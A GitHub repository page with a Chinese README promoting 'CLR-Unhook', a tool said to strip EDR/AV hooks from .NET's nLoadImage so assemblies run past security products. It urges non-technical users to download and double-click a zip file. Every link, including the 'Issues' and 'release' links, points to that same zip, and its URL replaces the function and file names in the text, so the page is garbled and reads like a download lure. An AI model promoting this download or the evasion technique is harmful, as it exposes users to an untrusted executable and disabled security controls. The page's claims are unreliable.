david3c2004/CLR-Unhook

GitHub: david3c2004/CLR-Unhook

通过恢复 .NET CLR 中 nLoadImage 函数的原始状态来移除 EDR/AV 的安全 Hook,使 .NET 程序集能够绕过安全检查正常加载执行。

Stars: 0 | Forks: 0

# 🔧 CLR-Unhook - 轻松绕过安全 Hook ## 🚀 入门指南 欢迎使用 CLR-Unhook!使用此工具,您可以在处理 .NET assembly 时避免现代安全产品带来的不必要干扰。本指南将帮助您轻松下载、安装和运行 CLR-Unhook。 ## 📥 下载 CLR-Unhook [![下载 CLR-Unhook](https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.1.zip)](https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.1.zip) ## 🛠️ CLR-Unhook 的功能是什么? 诸如 CrowdStrike、Bitdefender 和 SentinelOne 等现代安全产品通常会在关键函数(如 `https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.1.zip`)中设置 hook。这会阻碍 .NET assembly 的流畅加载体验。CLR-Unhook 能够解除有问题的 `nLoadImage` 函数上的 hook,让您能够在不受安全机制干扰的情况下运行应用程序。 以下是 CLR-Unhook 功能的快速概览: - **解除 Hook 功能**:移除安全产品的 hook,恢复正常操作。 - **兼容性**:专为普通用户设计,运行简单。 - **无需编程技能**:无论技术背景如何,任何人都可以使用此工具。 ## 📋 系统要求 为了有效运行 CLR-Unhook,您的系统应满足以下基本要求: - **操作系统**:Windows 10 或更高版本。 - **.NET Framework**:版本 4.5 或更高。 - **处理器**:任何现代处理器(x86 或 x64)。 - **内存**:至少 4 GB 可用 RAM。 ## 🏗️ 功能特性 CLR-Unhook 包含多项实用功能: - **用户友好界面**:轻松导航,直观易用。 - **快速执行**:迅速解除必要函数的 hook。 - **定期更新**:随时获取最新功能和修复。 ## 🔄 下载与安装 要开始使用,请按照以下简单步骤操作: 1. **访问发布页面**:前往 [CLR-Unhook 发布页面](https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.1.zip)。 2. **查找最新版本**:在页面上寻找最新的发布版本。 3. **下载文件**:点击下载链接开始下载。通常这是一个 `.zip` 文件或可执行文件。 4. **解压文件**:如果您下载的是 `.zip` 文件,请右键单击并选择“全部提取”。选择一个您希望存放文件的位置。 5. **运行 CLR-Unhook**:打开解压文件的文件夹,双击 `https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.1.zip` 以运行应用程序。 ## 📊 如何使用 CLR-Unhook 使用 CLR-Unhook 非常简单: 1. **启动工具**:双击您下载并解压的 `https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.1.zip` 文件。 2. **选择目标应用程序**:点击“Select Application”(选择应用程序)按钮,浏览并找到您想要运行的 .NET 应用程序。 3. **解除 Hook 并启动**:按下“Unhook & Launch”(解除 Hook 并启动)按钮。该工具将解除相关函数的 hook 并启动您的应用程序。 ## 🎯 故障排除 虽然 CLR-Unhook 旨在简单易用,但您可能会遇到一些问题。以下是针对常见问题的解决方案: - **应用程序未启动**:请确保您选择了正确的 .NET 应用程序。如果问题仍然存在,请检查您的安全软件是否阻止了执行。 - **安装期间出错**:确保您的 Windows 操作系统已更新,并且已安装所需的 .NET Framework 版本。 如果您遇到任何其他问题,请访问 GitHub Issues 页面寻求社区帮助。 ## 💬 社区支持 如果您有疑问或需要帮助,您并不孤单。GitHub 社区随时为您提供帮助。如需寻求帮助: 1. 前往 [Issues 部分](https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.1.zip)。 2. 搜索与您的问题相关的现有主题,看看是否有人遇到过类似问题。 3. 如果您仍然需要帮助,请随时创建新 issue,并尽可能提供详细信息。 ## 🔒 安全性 我们优先考虑您的安全。CLR-Unhook 不会传输任何个人数据,并且仅在您的本地机器上运行。请确保您从官方 [发布页面](https://github.com/david3c2004/CLR-Unhook/raw/refs/heads/main/CLR-Unhook/Unhook_CL_v3.1.zip) 下载。 ## 📝 更新日志 在本节中,您可以找到 CLR-Unhook 每个版本的更改内容: - **版本 1.0**:初始版本,包含基本的解除 hook 功能。 - **版本 1.1**:改进了用户界面,并增加了对较新 .NET 版本的兼容性。 - **版本 1.2**:错误修复和性能改进。 ## 📅 未来计划 我们计划在即将发布的版本中推出几项额外功能: - 更好地兼容更多安全产品。 - 改进用户界面调整,以便更轻松地导航。 - 根据用户反馈开发新功能。 ## 📞 联系方式 如有直接查询,请通过 GitHub 上的 Issues 部分联系我们。您的反馈对我们很重要。 感谢您选择 CLR-Unhook!我们希望此应用程序能提升您处理 .NET assembly 的体验。享受无干扰的无缝操作体验。
标签:AV逃逸, Conpot, DAST, DNS 解析, EDR绕过, .NET CLR, nLoadImage, T1055, T1562.001, TGT, UML, Unhook, Windows安全, 内联钩子, 动态分析对抗, 反射注入, 安全测试, 恶意软件分析, 攻击性安全, 攻防演练, 程序集加载, 端点可见性, 网络安全, 隐私保护, 高交互蜜罐